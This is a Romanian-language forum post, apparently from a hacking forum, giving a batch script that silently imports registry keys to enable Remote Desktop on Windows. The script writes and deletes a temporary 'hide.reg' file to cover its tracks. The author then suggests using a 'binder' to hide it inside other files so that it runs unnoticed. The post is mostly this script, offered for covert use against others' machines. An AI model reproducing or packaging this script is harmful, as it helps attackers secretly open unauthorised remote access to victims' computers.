Jump to content
c0der

Cum sa cream o conexiune remote desktop folosind registrii?

Recommended Posts

creati un fisier nou denumit new.txt si salvati-l pe desktop.

scrieti in el urmatorii parametrii:

@echo off

@echo ***********************************************************************

@echo * *

@echo * Enable Remote Desktop From Dos *

@echo * *

@echo * *

@echo * *

@echo * *

@echo * *

@echo * Terminal Server Is Enable Now...... *

@echo * *

@echo * *

@echo * *

@echo * *

@echo ***********************************************************************

echo Windows Registry Editor Version 5.00> c:\hide.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\hide.reg

echo "fDenyTSConnections"=dword:00000000>> c:\hide.reg

REGEDIT /S c:\hide.REG

DEL /Q c:\hide.REG

echo Windows Registry Editor Version 5.00> c:\hide.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\hide.reg

echo "AllowTSConnections"=dword:00000001>> c:\hide.reg

REGEDIT /S c:\hide.REG

DEL /Q c:\hide.REG

echo Windows Registry Editor Version 5.00> c:\hide.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\hide.reg

echo "fAllowToGetHelp"=dword:00000001>> c:\hide.reg

REGEDIT /S c:\hide.REG

DEL /Q c:\hide.REG

credits-urile nu sunt ale mele nu mai tin minte site-ul de unde l-am luat, sa nu-mi sariti in cap acum.

acum dupa ce ati scris textul de la quote in new.txt, salvati-l si apoi dati-i denumirea new.bat, si asta este.

cum testez?

poti incerca si pe calculatorul tau executand fisierul new.bat

acum minune, la remote desktop este bifata optiunea "allow remote users to connect to this computer"

puteti lipi cu un binder in orice fisier vrei ca sa fie executat.numai bine

stiu ca este un n00b tutorial dar sper sa va foloseasca.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...